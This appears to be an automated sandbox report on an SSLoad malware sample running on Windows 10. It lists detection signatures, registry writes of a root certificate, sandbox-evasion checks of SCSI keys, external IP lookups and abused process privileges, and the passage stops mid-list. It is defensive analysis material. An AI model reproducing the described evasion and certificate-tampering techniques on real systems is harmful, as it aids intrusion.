Analysis
-
max time kernel
285s -
max time network
283s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
13-05-2024 13:08
Static task
static1
URLScan task
urlscan1
General
Malware Config
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
net.exenet.exenet.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2060 4648 net.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 460 4648 net.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5024 4648 net.exe -
Detects SSLoad Unpacked payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1952-291-0x0000000003530000-0x00000000035A3000-memory.dmp family_ssload -
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exeMsiExec.exeflow pid process 46 3452 WScript.exe 48 3452 WScript.exe 59 1952 MsiExec.exe 61 1952 MsiExec.exe -
Loads dropped DLL 15 IoCs
Processes:
MsiExec.exeMsiExec.exeMsiExec.exepid process 3736 MsiExec.exe 3736 MsiExec.exe 3736 MsiExec.exe 3736 MsiExec.exe 3736 MsiExec.exe 3736 MsiExec.exe 5088 MsiExec.exe 5088 MsiExec.exe 5088 MsiExec.exe 5088 MsiExec.exe 5088 MsiExec.exe 5088 MsiExec.exe 1952 MsiExec.exe 1952 MsiExec.exe 1952 MsiExec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 58 api.ipify.org 59 api.ipify.org -
Drops file in Windows directory 9 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI8CC1.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{52EF198D-0C6C-406A-803F-F86D93DD7930} msiexec.exe File opened for modification C:\Windows\Installer\MSI8D5F.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5a8be6.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8C34.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e5a8be6.msi msiexec.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exetaskmgr.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000072b368a908c284c40000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000072b368a90000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090072b368a9000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d72b368a9000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000072b368a900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exeStartMenuExperienceHost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe -
Processes:
WScript.exeWScript.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 WScript.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsiexec.exetaskmgr.exepid process 1796 msedge.exe 1796 msedge.exe 4628 msedge.exe 4628 msedge.exe 4476 identity_helper.exe 4476 identity_helper.exe 4856 msedge.exe 4856 msedge.exe 4212 msiexec.exe 4212 msiexec.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe 2408 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid process 3316 7zFM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe 4628 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exemsiexec.exemsiexec.exedescription pid process Token: SeRestorePrivilege 3316 7zFM.exe Token: 35 3316 7zFM.exe Token: SeSecurityPrivilege 3316 7zFM.exe Token: SeShutdownPrivilege 3080 msiexec.exe Token: SeIncreaseQuotaPrivilege 3080 msiexec.exe Token: SeSecurityPrivilege 4212 msiexec.exe Token: SeCreateTokenPrivilege 3080 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3080 msiexec.exe Token: SeLockMemoryPrivilege 3080 msiexec.exe Token: SeIncreaseQuotaPrivilege 3080 msiexec.exe Token: SeMachineAccountPrivilege 3080 msiexec.exe Token: SeTcbPrivilege 3080 msiexec.exe Token: SeSecurityPrivilege 3080 msiexec.exe Token: SeTakeOwnershipPrivilege 3080 msiexec.exe Token: SeLoadDriverPrivilege 3080 msiexec.exe Token: SeSystemProfilePrivilege 3080 msiexec.exe Token: SeSystemtimePrivilege 3080 msiexec.exe Token: SeProfSingleProcessPrivilege 3080 msiexec.exe Token: SeIncBasePriorityPrivilege 3080 msiexec.exe Token: SeCreatePagefilePrivilege 3080 msiexec.exe Token: SeCreatePermanentPrivilege 3080 msiexec.exe Token: SeBackupPrivilege 3080 msiexec.exe Token: SeRestorePrivilege 3080 msiexec.exe Token: SeShutdownPrivilege 3080 msiexec.exe Token: SeDebugPrivilege 3080 msiexec.exe Token: SeAuditPrivilege 3080 msiexec.exe Token: SeSystemEnvironmentPrivilege 3080 msiexec.exe Token: SeChangeNotifyPrivilege 3080 msiexec.exe Token: SeRemoteShutdownPrivilege 